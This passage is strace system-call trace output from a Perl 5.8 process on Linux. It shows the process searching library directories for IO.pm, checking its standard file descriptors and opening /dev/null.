12650 07:43:28.277943 stat64("/usr/local/share/perl/5.8.4", 0xbf99e450) = -1 ENOENT (No such file or directory)

12650 07:43:28.277955 stat64("/usr/local/lib/perl/5.8.3", 0xbf99e450) = -1 ENOENT (No such file or directory)

12650 07:43:28.277966 stat64("/usr/local/share/perl/5.8.3", 0xbf99e450) = -1 ENOENT (No such file or directory)

12650 07:43:28.277978 stat64("/usr/local/lib/perl/5.8.2", 0xbf99e450) = -1 ENOENT (No such file or directory)

12650 07:43:28.278000 stat64("/usr/local/share/perl/5.8.2", 0xbf99e450) = -1 ENOENT (No such file or directory)

12650 07:43:28.278040 stat64("/usr/local/lib/perl/5.8.1", 0xbf99e450) = -1 ENOENT (No such file or directory)

12650 07:43:28.278067 stat64("/usr/local/share/perl/5.8.1", 0xbf99e450) = -1 ENOENT (No such file or directory)

12650 07:43:28.278079 stat64("/usr/local/lib/perl/5.8.0", 0xbf99e450) = -1 ENOENT (No such file or directory)

12650 07:43:28.278091 stat64("/usr/local/share/perl/5.8.0", 0xbf99e450) = -1 ENOENT (No such file or directory)

12650 07:43:28.278115 ioctl(0, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbf99e148) = -1 ENOTTY (Inappropriate ioctl for device)

12650 07:43:28.278129 _llseek(0, 0, [0], SEEK_CUR) = 0

12650 07:43:28.278141 ioctl(1, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbf99e148) = -1 EBADF (Bad file descriptor)

12650 07:43:28.278165 _llseek(1, 0, 0xbf99e190, SEEK_CUR) = -1 EBADF (Bad file descriptor)

12650 07:43:28.278176 ioctl(2, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbf99e148) = -1 EINVAL (Invalid argument)

12650 07:43:28.278186 _llseek(2, 0, 0xbf99e190, SEEK_CUR) = -1 ESPIPE (Illegal seek)

12650 07:43:28.278197 open("/dev/null", O_RDONLY|O_LARGEFILE) = 1

12650 07:43:28.278209 ioctl(1, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbf99e208) = -1 ENOTTY (Inappropriate ioctl for device)

12650 07:43:28.278219 _llseek(1, 0, [0], SEEK_CUR) = 0

12650 07:43:28.278231 fcntl64(1, F_SETFD, FD_CLOEXEC) = 0

12650 07:43:28.278243 fstat64(1, {st_mode=S_IFCHR|0666, st_rdev=makedev(1, 3), ...}) = 0

12650 07:43:28.278261 rt_sigaction(SIGCHLD, NULL, {SIG_DFL}, 8) = 0

12650 07:43:28.278314 readlink("/proc/self/exe", "/usr/bin/perl", 4095) = 13

12650 07:43:28.278358 getppid()         = 12648

12650 07:43:28.278419 stat64("/etc/perl/IO.pmc", 0xbf99defc) = -1 ENOENT (No such file or directory)

12650 07:43:28.278433 stat64("/etc/perl/IO.pm", 0xbf99de0c) = -1 ENOENT (No such file or directory)

12650 07:43:28.278446 stat64("/usr/local/lib/perl/5.8.8/IO.pmc", 0xbf99defc) = -1 ENOENT (No such file or directory)

12650 07:43:28.278462 stat64("/usr/local/lib/perl/5.8.8/IO.pm", 0xbf99de0c) = -1 ENOENT (No such file or directory)

12650 07:43:28.278476 stat64("/usr/local/share/perl/5.8.8/IO.pmc", 0xbf99defc) = -1 ENOENT (No such file or directory)

12650 07:43:28.278498 stat64("/usr/local/share/perl/5.8.8/IO.pm", 0xbf99de0c) = -1 ENOENT (No such file or directory)

12650 07:43:28.278512 stat64("/usr/lib/perl5/IO.pmc", 0xbf99defc) = -1 ENOENT (No such file or directory)

12650 07:43:28.278524 stat64("/usr/lib/perl5/IO.pm", 0xbf99de0c) = -1 ENOENT (No such file or directory)

